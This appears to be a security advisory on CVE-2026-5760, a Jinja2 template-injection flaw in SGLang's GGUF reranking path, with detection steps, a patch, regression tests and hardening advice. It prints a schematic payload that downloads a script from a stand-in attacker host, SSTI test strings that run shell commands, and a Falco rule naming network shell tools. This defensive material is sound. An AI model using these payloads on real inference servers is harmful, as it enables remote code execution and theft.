Vulnerability Analysis

CVE-2026-5760: SGLang GGUF Model RCE — How a Malicious AI Model Can Destroy Your Inference Server

Executive Summary

CVE-2026-5760 is a critical (CVSS 9.8) Server-Side Template Injection (SSTI) vulnerability in SGLang, a widely used open-source inference framework for large language models and multimodal AI models. By embedding a malicious Jinja2 payload inside a GGUF model's tokenizer.chat_template field, an attacker can execute arbitrary Python — and therefore arbitrary OS commands — on the hosting inference server the moment that model is loaded and a request hits the /v1/rerank endpoint. The attack requires no authentication and can be delivered entirely through poisoned models published on platforms like Hugging Face, making this a first-class AI supply chain threat.


1. What Is This Vulnerability?

SGLang is a high-performance, open-source framework for serving large language models (LLMs) and multimodal models. It exposes an OpenAI-compatible API and supports GGUF, the "GPT-Generated Unified Format" popularized by llama.cpp, as a model format.

The vulnerability resides in serving_rerank.py, the component responsible for SGLang's reranking endpoint (/v1/rerank). When processing a chat template read from a loaded GGUF model, SGLang renders it with the standard, unsandboxed jinja2.Environment class:

# VULNERABLE CODE (serving_rerank.py — SGLang ≤ 0.5.9)
from jinja2 import Environment

env = Environment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)

The Jinja2 Environment() class, by design, does not restrict access to Python builtins, object attributes, or class hierarchies. This is safe when the template source is trusted, but catastrophically dangerous when it originates from user-supplied content — such as the tokenizer.chat_template field embedded in an untrusted GGUF file.

The correct approach is ImmutableSandboxedEnvironment, which strips access to dangerous Python internals:

# SAFE CODE
from jinja2.sandbox import ImmutableSandboxedEnvironment

env = ImmutableSandboxedEnvironment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)
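
The difference between the two environments can be observed with a harmless probe. The sketch below is illustrative and not taken from SGLang: PROBE and render_probe are hypothetical names, and the probe only reads a class name rather than executing anything.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Harmless probe: walks from a string literal to its base class and reads the name.
PROBE = "{{ ''.__class__.__mro__[1].__name__ }}"


def render_probe(env: Environment) -> str:
    """Render PROBE in the given environment, reporting a sandbox refusal as text."""
    try:
        return env.from_string(PROBE).render()
    except SecurityError as exc:
        return f"blocked: {exc}"


unsandboxed_result = render_probe(Environment())
sandboxed_result = render_probe(ImmutableSandboxedEnvironment())

print(unsandboxed_result)
print(sandboxed_result)
```

In the unsandboxed environment the attribute traversal succeeds, which is the foothold that real payloads build on. In the sandboxed environment the same chain is refused with a SecurityError.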

Attack Vector

An attacker crafts a GGUF model file where tokenizer.chat_template contains a Jinja2 SSTI payload. A trigger phrase — specifically the string "The answer can only be 'yes' or 'no'" — is woven into the template to activate SGLang's internal Qwen3 reranker detection logic, which is the code path that calls the vulnerable template renderer.

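A simplified, schematic version of the payload looks like this. The "x -> ..." arrow is shorthand for calling the located Popen class and is not valid Jinja2 syntax: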

{# Malicious tokenizer.chat_template #}
{% if 'The answer can only be \'yes\' or \'no\'' in messages[-1]['content'] %}
{{ ''.__class__.__mro__[1].__subclasses__() 
   | selectattr('__name__', 'equalto', 'Popen') | first 
   | (x -> x(['curl', 'https://attacker.com/shell.sh', '-o', '/tmp/s.sh'], 
             stdout=-1).communicate()) }}
{% endif %}
{{ messages | map(attribute='content') | join('\n') }}

When a victim loads this model and any request arrives at /v1/rerank, SGLang executes the template and the attacker's OS command runs with full inference server privileges.

Real-World Impact

While no confirmed in-the-wild exploitation campaign has been publicly attributed to this CVE as of April 2026, the attack surface is substantial:

  • Thousands of GGUF models are hosted on public repositories such as Hugging Face, many downloaded tens of thousands of times per day.
  • SGLang is used heavily in enterprise AI infrastructure, private AI clouds, and research clusters.
  • A compromised inference server may expose GPU resources, API keys, training data, proprietary model weights, and internal network access.
  • CERT/CC has issued advisory VU#915947, highlighting the severity of the supply chain risk.

2. Who Is Affected?

Factor | Details
Affected software | SGLang versions ≤ 0.5.9
Vulnerable component | serving_rerank.py (/v1/rerank endpoint)
Trigger condition | Loading a GGUF model with a malicious tokenizer.chat_template AND sending a request containing the trigger phrase to /v1/rerank
Attack authentication | None required — unauthenticated if /v1/rerank is internet-exposed
Deployment contexts at risk | Self-hosted SGLang servers, Kubernetes-based inference clusters, cloud GPU instances, HuggingFace Inference Endpoints using SGLang backends
Model distribution risk | Any org downloading GGUF models from unverified Hugging Face repos, model zoos, or community mirrors

You are at risk if:

  • You run SGLang version 0.5.9 or earlier
  • You load GGUF models from public repositories without inspecting their tokenizer.chat_template
  • Your SGLang /v1/rerank endpoint is accessible from the network (even internally)

3. How to Detect It (Testing)

Manual Testing Steps

Step 1 — Verify SGLang version:

pip show sglang | grep Version
# OR
python -c "import sglang; print(sglang.__version__)"

If the version is 0.5.9 or lower, the system is vulnerable.
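
The same check can be scripted for fleet-wide audits. This is a minimal sketch that assumes the affected range stated above (0.5.9 and earlier); the helper names are hypothetical, and the parser only compares the leading numeric release segment, so pre-release and post-release suffixes are ignored.

```python
import re
from importlib import metadata
from typing import Optional

# Last affected release according to this article (assumption: no later
# release is affected).
LAST_AFFECTED = (0, 5, 9)


def parse_release(version: str) -> tuple[int, ...]:
    """Extract the leading numeric release segment, e.g. '0.5.9.post1' -> (0, 5, 9)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"Unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_affected(version: str) -> bool:
    """Return True if the version is at or below the last affected release."""
    release = parse_release(version)
    width = max(len(release), len(LAST_AFFECTED))
    padded_release = release + (0,) * (width - len(release))
    padded_bound = LAST_AFFECTED + (0,) * (width - len(LAST_AFFECTED))
    return padded_release <= padded_bound


def installed_sglang_version() -> Optional[str]:
    """Return the installed sglang version, or None if it is not installed."""
    try:
        return metadata.version("sglang")
    except metadata.PackageNotFoundError:
        return None


installed = installed_sglang_version()
if installed is None:
    print("sglang is not installed in this environment")
else:
    status = "AFFECTED" if is_affected(installed) else "not in the affected range"
    print(f"sglang {installed}: {status}")
```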

Step 2 — Inspect GGUF model chat templates: Use the GGUFReader class from the gguf Python package to extract and review embedded templates:

pip install gguf
python -c "
import gguf
reader = gguf.GGUFReader('your_model.gguf')
for field in reader.fields.values():
    if 'chat_template' in field.name:
        print(field.name, bytes(field.parts[-1]).decode('utf-8'))
"

Look for any Jinja2 constructs involving __class__, __mro__, __subclasses__, subprocess, os.system, Popen, eval, exec, or __import__.
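
For triage across many models, the manual review can be supported by a simple denylist scan. The sketch below is an assumption-laden aid, not a complete detector: the pattern list mirrors the constructs named above, find_suspicious_constructs is a hypothetical helper, and an obfuscated payload (for example one that builds attribute names by string concatenation) can evade it.

```python
import re

# (label, regex) pairs for the constructs listed above. Popen is matched
# case-insensitively so that os.popen-style calls are flagged as well.
SUSPICIOUS_PATTERNS = [
    ("__class__", r"__class__"),
    ("__mro__", r"__mro__"),
    ("__subclasses__", r"__subclasses__"),
    ("__import__", r"__import__"),
    ("subprocess", r"\bsubprocess\b"),
    ("os.system", r"\bos\.system\b"),
    ("Popen", r"(?i)\bpopen\b"),
    ("eval", r"\beval\b"),
    ("exec", r"\bexec\b"),
]


def find_suspicious_constructs(template: str) -> list[str]:
    """Return the labels of all denylisted constructs found in a chat template."""
    return [
        label
        for label, pattern in SUSPICIOUS_PATTERNS
        if re.search(pattern, template)
    ]


if __name__ == "__main__":
    sample = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
    print(find_suspicious_constructs(sample))
```

An empty result does not prove a template is safe; it only means none of the listed strings appear literally.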

Step 3 — Test the vulnerable code path directly: On a sandboxed/isolated server, send a reranking request with the trigger phrase:

curl -X POST http://localhost:30000/v1/rerank \
  -H "Content-Type: application/json" \
  -d '{
    "model": "your-loaded-model",
    "query": "The answer can only be '\''yes'\'' or '\''no'\''",
    "documents": ["test document one", "test document two"]
  }'

Monitor server-side for unexpected subprocess creation or outbound network connections.
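
If you can run code inside the Python process under test (for example in an isolated test harness), one way to observe subprocess creation is a Python audit hook. This is a sketch under that assumption and is not part of SGLang; observed_events and record_process_events are hypothetical names. Audit hooks require Python 3.8 or later and cannot be removed once installed, so use this only in disposable test processes.

```python
import subprocess
import sys

# Audit events raised by the standard library when a process is started.
WATCHED_EVENTS = {"subprocess.Popen", "os.system", "os.exec", "os.posix_spawn"}

# Collected (event name, arguments) pairs for later inspection.
observed_events: list[tuple[str, tuple]] = []


def record_process_events(event: str, args: tuple) -> None:
    """Record process-creation audit events; must never raise."""
    if event in WATCHED_EVENTS:
        observed_events.append((event, args))


sys.addaudithook(record_process_events)

# Demonstration with a harmless child process: the hook should record it.
subprocess.run([sys.executable, "-c", "pass"], check=True)

for event, args in observed_events:
    print(event, args[0])
```

In a real test you would install the hook before rendering the suspect template and then assert that observed_events stays empty.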

Automated Scanning

Tool: Snyk / Snyk CLI

snyk test --all-projects
# Look for: CVE-2026-5760 in sglang dependency tree

Tool: pip-audit

pip install pip-audit
pip-audit
# Illustrative output for vulnerable installs (advisory ID shown as a placeholder):
# sglang    0.5.9    CVE-2026-5760    GHSA-XXXX-XXXX

Tool: OSV-Scanner (Google)

osv-scanner --lockfile requirements.txt
# Or recursively scan a project directory:
osv-scanner -r /path/to/project

Tool: Trivy (container/image scanning)

trivy image your-sglang-docker-image:tag
# Filter for: CVE-2026-5760

Code Review Checklist

  • Search for from jinja2 import Environment in any file related to model serving or template rendering — unsafe pattern
  • Verify ImmutableSandboxedEnvironment or SandboxedEnvironment is used everywhere Jinja2 renders model-supplied templates
  • Confirm tokenizer.chat_template values are validated or stripped of dangerous constructs before rendering
  • Check that no GGUF model loading path passes raw chat_template fields directly into a Jinja2 render call
  • Audit any /v1/rerank or similar endpoint for input sanitization gaps
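
The first two checklist items can be partly automated with Python's ast module, which avoids false matches on comments and strings. The following is a minimal sketch, not a complete linter: find_plain_environment_calls is a hypothetical helper, it flags any call to a name or attribute called Environment (including non-Jinja2 classes that share the name), and it misses aliased imports.

```python
import ast


def find_plain_environment_calls(source: str) -> list[int]:
    """Return sorted line numbers where Environment(...) is called directly."""
    lines = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Handles both Environment(...) and jinja2.Environment(...).
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name == "Environment":
            lines.append(node.lineno)
    return sorted(lines)


SAMPLE = '''from jinja2 import Environment
from jinja2.sandbox import ImmutableSandboxedEnvironment

unsafe_env = Environment()
safe_env = ImmutableSandboxedEnvironment()
'''

flagged_lines = find_plain_environment_calls(SAMPLE)
print(flagged_lines)
```

Each flagged line still needs human review to decide whether the template it renders can come from a model file or other untrusted source.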

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Upgrade SGLang as soon as a release containing the sandboxed Jinja2 fix is available. As of disclosure, no official patched version had been published, so monitor the SGLang GitHub releases and apply the workarounds below in the meantime.

  2. Apply the Jinja2 sandbox fix manually if a patched SGLang release is unavailable. Locate serving_rerank.py in your SGLang installation:

    find $(python -c "import sglang; import os; print(os.path.dirname(sglang.__file__))") -name "serving_rerank.py"
    
  3. Replace the unsandboxed Environment:

    # BEFORE (vulnerable)
    from jinja2 import Environment
    env = Environment()
    
    # AFTER (safe)
    from jinja2.sandbox import ImmutableSandboxedEnvironment
    env = ImmutableSandboxedEnvironment()
    
  4. Audit all other Jinja2 usages in the codebase for the same pattern — any Environment() that renders external input is a candidate for the same class of vulnerability.

  5. Restart the SGLang service after applying the patch:

    systemctl restart sglang
    # OR for containerized deployments:
    kubectl rollout restart deployment/sglang-server
    
  6. Rotate credentials and secrets exposed on any inference servers that loaded models from unverified sources, as a precaution against prior exploitation.

Code Fix Example

# serving_rerank.py — BEFORE (CVE-2026-5760 vulnerable)
from jinja2 import Environment

def apply_chat_template(tokenizer, messages):
    env = Environment()  # ← No sandboxing; arbitrary code execution possible
    template = env.from_string(tokenizer.chat_template)
    return template.render(messages=messages)


# serving_rerank.py — AFTER (patched)
from jinja2.sandbox import ImmutableSandboxedEnvironment

def apply_chat_template(tokenizer, messages):
    env = ImmutableSandboxedEnvironment()  # ← Sandboxed; Python builtins blocked
    template = env.from_string(tokenizer.chat_template)
    return template.render(messages=messages)

ImmutableSandboxedEnvironment treats underscore-prefixed attributes such as __class__, __mro__, __subclasses__, and __globals__ as unsafe, which blocks the object-traversal chains that typical SSTI payloads rely on. A template that tries to follow such a chain raises a SecurityError, and the render fails instead of executing code.

Configuration Hardening

Network-level controls (immediate risk reduction):

# Restrict access to the SGLang port with iptables. Rules are evaluated in order,
# so the ACCEPT for internal ranges must come before the catch-all DROP:
iptables -A INPUT -p tcp --dport 30000 -s 10.0.0.0/8 -j ACCEPT  # Allow only internal
iptables -A INPUT -p tcp --dport 30000 -j DROP                  # Drop everything else

# OR restrict with nginx reverse proxy:
location /v1/rerank {
    allow 10.0.0.0/8;
    deny all;
    proxy_pass http://localhost:30000;
}

SGLang server startup flags:

# Bind only to localhost to prevent external exposure:
python -m sglang.launch_server \
  --model-path ./your_model.gguf \
  --host 127.0.0.1 \
  --port 30000

Container security (drop capabilities, read-only FS):

# In your Kubernetes pod spec:
securityContext:
  runAsNonRoot: true
  readOnlyRootFilesystem: true
  allowPrivilegeEscalation: false
  capabilities:
    drop: ["ALL"]

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A: Load a GGUF model with a benign tokenizer.chat_template and confirm /v1/rerank returns correct rankings — no functionality regression.
  • Scenario B: Load a GGUF model with a crafted malicious Jinja2 SSTI payload in tokenizer.chat_template and send the trigger request. Confirm that the request fails (for example, with an HTTP 4xx/5xx response caused by a jinja2 SecurityError) and that no subprocess is executed.
  • Scenario C: Send standard reranking requests with the trigger phrase in the query but with a benign model loaded — confirm no unexpected behavior.

Security Test Cases

Test Case 1: SSTI payload is blocked by sandboxed environment

  • Precondition: Apply Jinja2 ImmutableSandboxedEnvironment fix
  • Steps: Load a model with tokenizer.chat_template = "{{ ''.__class__.__mro__[1].__subclasses__() }}", send a POST to /v1/rerank
  • Expected Result: Server raises jinja2.exceptions.SecurityError: access to attribute '__class__' of 'str' object is unsafe, no code executed

Test Case 2: Outbound connection from exploit payload does not succeed

  • Precondition: Apply fix
  • Steps: Load a model with a curl-based SSTI exfiltration payload; monitor network with tcpdump -i any dst port 443
  • Expected Result: No outbound connections to attacker-controlled hosts

Test Case 3: Normal reranking continues to work

  • Precondition: Apply fix, legitimate model loaded
  • Steps: POST {"query": "cybersecurity", "documents": ["doc1", "doc2"]} to /v1/rerank
  • Expected Result: HTTP 200, valid ranking scores returned

Automated Tests

# test_cve_2026_5760.py — Security regression test
import pytest
from jinja2.sandbox import ImmutableSandboxedEnvironment
from jinja2.exceptions import SecurityError

MALICIOUS_TEMPLATES = [
    "{{ ''.__class__.__mro__[1].__subclasses__() }}",
    "{% for x in ().__class__.__base__.__subclasses__() %}{{ x.__name__ }}{% endfor %}",
    "{{ self.__init__.__globals__['__builtins__']['__import__']('os').system('id') }}",
    "{{ lipsum.__globals__['os'].popen('id').read() }}",
]

def test_ssti_payloads_blocked_by_sandbox():
    env = ImmutableSandboxedEnvironment()
    for payload in MALICIOUS_TEMPLATES:
        with pytest.raises(SecurityError):
            template = env.from_string(payload)
            template.render()

def test_legitimate_template_renders_correctly():
    env = ImmutableSandboxedEnvironment()
    template = env.from_string(
        "{% for msg in messages %}{{ msg.role }}: {{ msg.content }}\n{% endfor %}"
    )
    result = template.render(messages=[
        {"role": "user", "content": "Is the sky blue?"},
        {"role": "assistant", "content": "Yes."}
    ])
    assert "user: Is the sky blue?" in result
    assert "assistant: Yes." in result

Run the test suite:

pytest test_cve_2026_5760.py -v

6. Prevention & Hardening

Best Practices

AI Model Supply Chain Controls:

  • Only load GGUF models from organizationally vetted, internal model registries. Mirror approved models internally rather than downloading directly from Hugging Face during production deployments.
  • Implement a model vetting pipeline that extracts and statically analyzes tokenizer.chat_template for dangerous Jinja2 constructs before any model is deployed.
  • Use cryptographic model signing and verify signatures before loading. Tools like sigstore can be adapted for model artifact signing.
  • Apply the "principle of least trust" to all external model assets — treat them like untrusted user input.

Jinja2 Hardening in AI Frameworks:

  • Audit every place in your ML serving infrastructure where Jinja2 renders externally sourced templates. Use ImmutableSandboxedEnvironment universally for any template content that isn't 100% developer-controlled.
  • Add a grep-based CI check to flag unsafe Jinja2 Environment() usage:
    # In CI pipeline (matches Environment( and jinja2.Environment(, but not SandboxedEnvironment():
    if grep -rnE "(^|[^A-Za-z_])Environment\(" ./src --include="*.py"; then
      echo "FAIL: Unsandboxed Jinja2 found"; exit 1
    fi
    

Network Segmentation:

  • Never expose SGLang's API port (default: 30000) directly to the internet or untrusted networks. Place it behind an authenticated API gateway or reverse proxy.
  • Apply egress filtering on inference servers — they should not need to initiate outbound connections to arbitrary internet hosts.

Runtime Isolation:

  • Run inference servers in minimal containers with read-only filesystems and dropped Linux capabilities. Even if RCE occurs, a contained environment dramatically limits blast radius.
  • Use seccomp profiles to restrict the system calls available to the inference process:
    securityContext:
      seccompProfile:
        type: RuntimeDefault
    

Monitoring & Detection

Indicators of Compromise (IoCs):

  • Unexpected subprocess execution from the SGLang process (e.g., curl, wget, bash, sh) — monitor with auditd or eBPF-based tools like Falco
  • Outbound network connections from the inference server to unknown external IPs
  • New files created in /tmp, /dev/shm, or world-writable directories by the SGLang process
  • Unusual CPU/network spikes following GGUF model loads

Falco rule to detect suspicious subprocess spawning:

- rule: SGLang Spawns Shell
  desc: Detects shell or curl execution spawned from an SGLang inference process
  condition: >
    spawned_process and
    proc.pname in (sglang, python3, uvicorn) and
    proc.name in (bash, sh, curl, wget, nc, ncat, python3)
  output: "SGLang spawned suspicious process (proc=%proc.name parent=%proc.pname cmd=%proc.cmdline)"
  priority: CRITICAL

Model load audit logging: Log the SHA-256 hash of every GGUF model loaded and cross-reference against your approved model registry:

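import hashlib

# Hypothetical allowlist; populate it from your approved model registry.
APPROVED_MODEL_HASHES: set[str] = set()

def audit_model_load(model_path: str) -> str:
    """Return the SHA-256 digest of a model file, raising if it is not approved."""
    sha256 = hashlib.sha256()
    with open(model_path, "rb") as f:
        # Hash in 64 KiB chunks so multi-gigabyte models are not read into memory.
        for chunk in iter(lambda: f.read(65536), b""):
            sha256.update(chunk)
    digest = sha256.hexdigest()
    # Raise explicitly: assert statements are stripped when Python runs with -O.
    if digest not in APPROVED_MODEL_HASHES:
        raise PermissionError(f"Unapproved model hash: {digest}")
    return digest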
